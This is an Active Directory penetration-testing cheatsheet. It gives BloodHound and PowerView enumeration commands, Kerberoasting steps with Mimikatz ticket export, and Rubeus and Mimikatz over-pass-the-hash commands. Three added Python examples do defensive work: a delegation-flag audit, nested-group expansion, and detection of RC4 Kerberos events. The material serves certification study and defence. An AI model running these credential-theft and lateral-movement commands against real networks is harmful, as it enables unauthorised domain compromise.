
Active Directory (AD) Cheatsheet

This post assumes that opsec is not a concern and that you can be as noisy as the enumeration and lateral movement require. It is meant for pentesters and defenders alike, for the same reason: to understand the AD environment better.

This cheatsheet should help with certifications such as CRTP, OSCP and PNPT.

Note: only the most commonly used flags and switches are listed. The best documentation is the code itself.

This is a living document. Last updated: 19 / June / 2022


Initial and lateral movement enumeration

Get the Dog Out - SharpHound + BloodHound

Let’s have the dog sniff things out, because automated enumeration is cool.

The tools used are BloodHound and SharpHound.exe or SharpHound.ps1.

Use secure LDAP (LDAPS) for collection

./SharpHound.exe --SecureLdap

Getting all the data

./SharpHound.exe --CollectionMethod All

It’s best to pull session info separately.
Gathering data in a loop (default duration 2 hours) makes sense for sessions, as they change over time.

./SharpHound.exe --CollectionMethod Session [--Loop] [--LoopDuration <HH:MM:SS>] [--LoopInterval <HH:MM:SS>]

Run in a different context

./SharpHound.exe --CollectionMethod All --LdapUsername <user_name> --LdapPassword <pass>

Specify domain

./SharpHound.exe -d this.domain.local --CollectionMethod All

The next step is to feed this data into the BloodHound GUI and finally have some fun :)

Getting Hands Dirty - PowerView

Let’s have some fun ourselves with manual enumeration.

We will use PowerView and some net commands to enumerate manually.

This assumes the latest PowerView script (the master and dev branches are the same) has been loaded into memory.

Domain Enumeration

Get basic information of the domain


Get domain SID


Get domain policies

Get-DomainPolicy [-Domain <target>]

Get domain Kerberos policy


Get list of DCs

Get-DomainController [-Domain <target>]


nslookup <target_dc>

Forest Enumeration

Get current forest


Get a list of domains

Get-ForestDomain [-Forest <target>]

User Enumeration

Get a list of users

Get-NetUser [-Domain <target>] [user_name]
net user /domain

Get a count of users


Get a list of users with some specific properties

Get-NetUser [-Properties <>] 

Get a list of users with their logon counts and bad password attempts, keeping only those with more than 0 bad attempts

Get-NetUser | select cn, logoncount, badpwdcount | ? {$_.badpwdcount -gt 0}

Finding users with SPN

Get-NetUser -SPN

Finding users configured for constrained delegation (AllowedToDelegateTo set)

Get-NetUser -TrustedToAuth

Finding users whose credentials can be delegated (not marked "sensitive and cannot be delegated")

Get-NetUser -AllowDelegation

Computer Enumeration

Get a list of computers

Get-NetComputer [-Domain <target>] [-OperatingSystem "*2016*"] [-Properties <>]

Get a list of computers with Unconstrained delegation

Get-NetComputer -Unconstrained

Finding computers configured for constrained delegation (AllowedToDelegateTo set)

Get-NetComputer -TrustedToAuth
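The PowerView switches used in the user and computer sections above (-SPN, -TrustedToAuth, -AllowDelegation, -Unconstrained) are LDAP filters on servicePrincipalName and on specific userAccountControl bits. The following Python is an added example, not code from this cheatsheet or from PowerView, that evaluates those same attributes over a constructed set of LDAP-style records, so a defender can run one audit pass over an LDAP export instead of the separate queries. It generalises the cheatsheet's one-off queries slightly: it also separates domain controllers from the unconstrained-delegation finding, since DCs hold that bit by design. The sample objects and the corp.local names are made up.

```python
from typing import Dict, List

# Documented userAccountControl flag bits (the same values PowerView's LDAP filters test)
NORMAL_ACCOUNT = 0x200
WORKSTATION_TRUST_ACCOUNT = 0x1000          # domain-joined computer
SERVER_TRUST_ACCOUNT = 0x2000               # domain controller
DONT_EXPIRE_PASSWORD = 0x10000
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation (-Unconstrained)
NOT_DELEGATED = 0x100000                    # "sensitive and cannot be delegated" (-AllowDelegation is the inverse)
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition (-TrustedToAuth)

# Constructed sample records using LDAP attribute names; not real directory data.
SAMPLE_OBJECTS: List[Dict] = [
    {"sAMAccountName": "svc_sql", "userAccountControl": NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD,
     "servicePrincipalName": ["MSSQLSvc/sql01.corp.local:1433"], "badPwdCount": 0},
    {"sAMAccountName": "websvc",
     "userAccountControl": NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "servicePrincipalName": ["HTTP/web01.corp.local"],
     "msDS-AllowedToDelegateTo": ["cifs/fs01.corp.local"], "badPwdCount": 3},
    {"sAMAccountName": "da_admin", "userAccountControl": NORMAL_ACCOUNT | NOT_DELEGATED,
     "servicePrincipalName": [], "badPwdCount": 0},
    {"sAMAccountName": "jdoe", "userAccountControl": NORMAL_ACCOUNT,
     "servicePrincipalName": [], "badPwdCount": 1},
    {"sAMAccountName": "DC01$", "userAccountControl": SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION,
     "servicePrincipalName": ["HOST/dc01.corp.local"], "badPwdCount": 0},
    {"sAMAccountName": "WEB01$", "userAccountControl": WORKSTATION_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION,
     "servicePrincipalName": ["HOST/web01.corp.local"], "badPwdCount": 0},
]


def is_computer(obj: Dict) -> bool:
    return bool(obj["userAccountControl"] & (WORKSTATION_TRUST_ACCOUNT | SERVER_TRUST_ACCOUNT))


def is_domain_controller(obj: Dict) -> bool:
    return bool(obj["userAccountControl"] & SERVER_TRUST_ACCOUNT)


def has_spn(obj: Dict) -> bool:            # what -SPN selects on
    return bool(obj.get("servicePrincipalName"))


def trusted_to_auth(obj: Dict) -> bool:    # what -TrustedToAuth selects on
    return bool(obj["userAccountControl"] & TRUSTED_TO_AUTH_FOR_DELEGATION)


def allows_delegation(obj: Dict) -> bool:  # what -AllowDelegation selects on
    return not (obj["userAccountControl"] & NOT_DELEGATED)


def unconstrained(obj: Dict) -> bool:      # what -Unconstrained selects on
    return bool(obj["userAccountControl"] & TRUSTED_FOR_DELEGATION)


def audit(objects: List[Dict]) -> Dict[str, List[str]]:
    """One pass over exported objects; returns sorted account names per finding."""
    findings: Dict[str, List[str]] = {
        "users_with_spn": [],             # service accounts whose TGS can be requested by any user
        "constrained_delegation": [],     # TRUSTED_TO_AUTH set; review msDS-AllowedToDelegateTo targets
        "unconstrained_non_dc": [],       # unconstrained delegation outside domain controllers
        "users_allowing_delegation": [],  # not protected by NOT_DELEGATED
        "bad_password_attempts": [],      # badPwdCount > 0
    }
    for obj in objects:
        name = obj["sAMAccountName"]
        if not is_computer(obj) and has_spn(obj):
            findings["users_with_spn"].append(name)
        if trusted_to_auth(obj):
            findings["constrained_delegation"].append(name)
        if unconstrained(obj) and not is_domain_controller(obj):
            findings["unconstrained_non_dc"].append(name)
        if not is_computer(obj) and allows_delegation(obj):
            findings["users_allowing_delegation"].append(name)
        if obj.get("badPwdCount", 0) > 0:
            findings["bad_password_attempts"].append(name)
    return {key: sorted(names) for key, names in findings.items()}


if __name__ == "__main__":
    for finding, names in audit(SAMPLE_OBJECTS).items():
        print(f"{finding}: {', '.join(names) or '-'}")
```

Privileged accounts that show up under users_allowing_delegation are the ones to mark "sensitive and cannot be delegated" or put in Protected Users; a non-DC under unconstrained_non_dc should be moved to constrained or resource-based delegation.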

Group Enumeration

Get a list of groups in a domain

net group /domain

Get a list of groups in a domain with PowerView

Get-NetGroup [-Domain <target>] [-FullData] [-GroupName "*admin*"] [-Username 'user_name']

Get group membership

Get-NetGroupMember [-GroupName 'group_name'] [-Recurse]
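Get-NetGroupMember -Recurse walks nested groups, and Get-NetGroup -Username reports the groups an account sits in. The Python below is an added example, not the cheatsheet's or PowerView's code, showing the transitive expansion those switches rely on over a constructed group tree that contains a nesting loop: it records, for each user, the shortest nesting path that grants membership, which is what you need when auditing how someone ended up in Domain Admins. Group and user names are made up.

```python
from collections import deque
from typing import Dict, List

# Constructed directory: group -> direct members (users or nested groups). Not real data.
SAMPLE_GROUPS: Dict[str, List[str]] = {
    "Domain Admins": ["Administrator", "Tier0-Ops"],
    "Tier0-Ops": ["alice", "Helpdesk-Leads"],
    "Helpdesk-Leads": ["bob", "Tier0-Ops"],   # nesting loop back into Tier0-Ops
    "Helpdesk": ["carol", "Helpdesk-Leads"],
}


def expand_group(groups: Dict[str, List[str]], group: str) -> Dict[str, List[str]]:
    """Transitive user members of `group`, each with the shortest nesting path that grants it.

    Breadth-first, so the first path that reaches a user is the shortest; `seen` stops cycles.
    """
    members: Dict[str, List[str]] = {}
    seen = set()
    queue = deque([(group, [group])])
    while queue:
        current, path = queue.popleft()
        if current in seen:
            continue
        seen.add(current)
        for member in groups.get(current, []):
            if member in groups:                  # nested group: keep walking
                queue.append((member, path + [member]))
            else:                                 # user: record the first (shortest) path only
                members.setdefault(member, path)
    return members


def groups_of_user(groups: Dict[str, List[str]], user: str) -> List[str]:
    """Every group the user is a transitive member of (the recursive form of -Username)."""
    return sorted(g for g in groups if user in expand_group(groups, g))


if __name__ == "__main__":
    for user, path in expand_group(SAMPLE_GROUPS, "Domain Admins").items():
        print(f"{user:<14} via {' -> '.join(path)}")
    print("bob is in:", ", ".join(groups_of_user(SAMPLE_GROUPS, "bob")))
```

In the sample, bob reaches Domain Admins only through Helpdesk-Leads being nested in Tier0-Ops, which is the kind of indirect membership a flat Get-NetGroupMember call would miss.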

Share Enumeration

List shares the current user has access to

Invoke-ShareFinder -CheckShareAccess -ErrorAction SilentlyContinue [-ComputerDomain <target_domain>]

ACL Enumeration

Get resolved ACEs, optionally for a specific user/group and domain

Get-ObjectAcl [-Identity <user_name>] [-Domain <target_domain>] -ResolveGUIDs

Get interesting resolved ACLs

Invoke-ACLScanner [-Domain <target_domain>] -ResolveGUIDS

Get interesting resolved ACLs held by a specific principal (e.g. noobsec)

Invoke-ACLScanner -ResolveGUIDS | ?{$_.IdentityReference -match 'noobsec'}

Session Enumeration

Finding sessions on a computer

Get-NetSession [-Computer <comp_name>]

Find who is logged on locally on a given machine

Get-LoggedOnLocal [-ComputerName <comp_name>]

User Hunting

Get a list of machines where the current user has local admin access

Find-LocalAdminAccess [-Domain <target_domain>]

Find machines where members of a specific group have sessions (default: Domain Admins)

Invoke-UserHunter [-GroupName <group_name>]

Find machines where the current user has local admin access AND sessions of the specified group are present

Invoke-UserHunter -CheckAccess

Lateral Movement


To see existing tickets


Remove all tickets

klist purge


Request a Kerberos service ticket for the specified SPN.
Output is in Hashcat format by default

Request-SPNTicket -SPN "CIFS/target.domain.local" [-OutputFormat JTR]


When done manually, the ticket is requested into the current session and must then be exported before the hash can be cracked

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "CIFS/target.domain.local"

Dump the tickets out

Invoke-Mimikatz -Command '"kerberos::list /export"'

Now, crack ’em

Over-Pass the Hash


Rubeus.exe asktgt /user:USER < /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/opsec] /ptt


sekurlsa::pth /user:Administrator /domain:target.domain.local < /ntlm:hash | /aes256:hash> /run:powershell.exe
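On the defensive side, both the service-ticket requests described above and the Over-Pass the Hash variants that use an RC4 key leave the same trace on the domain controller: Kerberos events with an RC4-HMAC ticket encryption type (0x17) where AES would be expected. The Python below is an added example, not part of this cheatsheet or of any of the tools it lists, run over a handful of constructed Security-log records (Event IDs 4769 and 4768, fields named as in the event XML) to show two checks a defender can apply to exported logs: a user requesting RC4 tickets for several user-held SPNs in a short window, and an RC4 TGT issued for an account that is known to support AES. The AES_CAPABLE_ACCOUNTS set is an assumption standing in for an msDS-SupportedEncryptionTypes export; hostnames, users and addresses are made up. Note the caveat: the /aes128 and /aes256 paths of Rubeus and Mimikatz produce no encryption downgrade, so this signal covers only the RC4 case.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterator, List, Set, Tuple

RC4_HMAC = "0x17"   # TicketEncryptionType value for RC4-HMAC in 4768/4769 events

# Constructed sample Security-log events (field names as in the event XML); not real logs.
SAMPLE_EVENTS: List[Dict] = [
    {"EventID": 4769, "TimeCreated": "2022-06-19T10:00:01", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.25"},
    {"EventID": 4769, "TimeCreated": "2022-06-19T10:00:02", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "websvc", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.25"},
    {"EventID": 4769, "TimeCreated": "2022-06-19T10:00:03", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.25"},
    {"EventID": 4769, "TimeCreated": "2022-06-19T10:05:00", "TargetUserName": "alice@CORP.LOCAL",
     "ServiceName": "FS01$", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.31"},  # normal AES TGS
    {"EventID": 4769, "TimeCreated": "2022-06-19T10:06:00", "TargetUserName": "alice@CORP.LOCAL",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.31"}, # TGT renewal
    {"EventID": 4768, "TimeCreated": "2022-06-19T10:07:00", "TargetUserName": "Administrator",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.25"},  # RC4 TGT for an AES-capable account
    {"EventID": 4768, "TimeCreated": "2022-06-19T10:08:00", "TargetUserName": "bob",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.40"},
]

# Assumption: accounts whose msDS-SupportedEncryptionTypes include AES (taken from a directory
# export in practice), so an RC4 TGT for them is a downgrade worth looking at.
AES_CAPABLE_ACCOUNTS: Set[str] = {"Administrator", "bob"}


def account(name: str) -> str:
    """4769 carries user@REALM while 4768 carries the bare name; normalise to the bare name."""
    return name.split("@", 1)[0]


def _rc4_user_spn_requests(events: List[Dict]) -> Iterator[Tuple[datetime, str, str]]:
    """RC4 TGS requests for SPNs held by user accounts (skip computer accounts and krbtgt)."""
    for e in events:
        if e["EventID"] != 4769 or e["TicketEncryptionType"] != RC4_HMAC:
            continue
        service = e["ServiceName"]
        if service.lower() == "krbtgt" or service.endswith("$"):
            continue
        yield datetime.fromisoformat(e["TimeCreated"]), account(e["TargetUserName"]), service


def rc4_service_ticket_requests(events: List[Dict]) -> List[Tuple[str, str]]:
    """(requesting user, service account) pairs for every RC4 user-SPN ticket request."""
    return [(user, service) for _, user, service in _rc4_user_spn_requests(events)]


def kerberoast_suspects(events: List[Dict], threshold: int = 3,
                        window: timedelta = timedelta(minutes=5)) -> List[str]:
    """Users that requested RC4 tickets for at least `threshold` distinct user SPNs within `window`."""
    per_user: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for t, user, service in _rc4_user_spn_requests(events):
        per_user[user].append((t, service))
    suspects = []
    for user, reqs in per_user.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):          # sliding window over the user's requests
            distinct = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(distinct) >= threshold:
                suspects.append(user)
                break
    return sorted(suspects)


def rc4_tgt_for_aes_accounts(events: List[Dict], aes_accounts: Set[str]) -> List[str]:
    """Accounts that got an RC4 TGT (4768) although they are known to support AES."""
    return sorted({account(e["TargetUserName"]) for e in events
                   if e["EventID"] == 4768 and e["TicketEncryptionType"] == RC4_HMAC
                   and account(e["TargetUserName"]) in aes_accounts})


if __name__ == "__main__":
    print("RC4 service ticket requests:", rc4_service_ticket_requests(SAMPLE_EVENTS))
    print("Kerberoast suspects:", kerberoast_suspects(SAMPLE_EVENTS))
    print("RC4 TGT for AES-capable accounts:", rc4_tgt_for_aes_accounts(SAMPLE_EVENTS, AES_CAPABLE_ACCOUNTS))
```

Tune the threshold and window to the environment: a single RC4 request to a legacy service account is normal noise, while one source requesting every user SPN in seconds is not. Pairing the 4768 check with the encryption types actually configured per account keeps false positives down where RC4 is still legitimately in use.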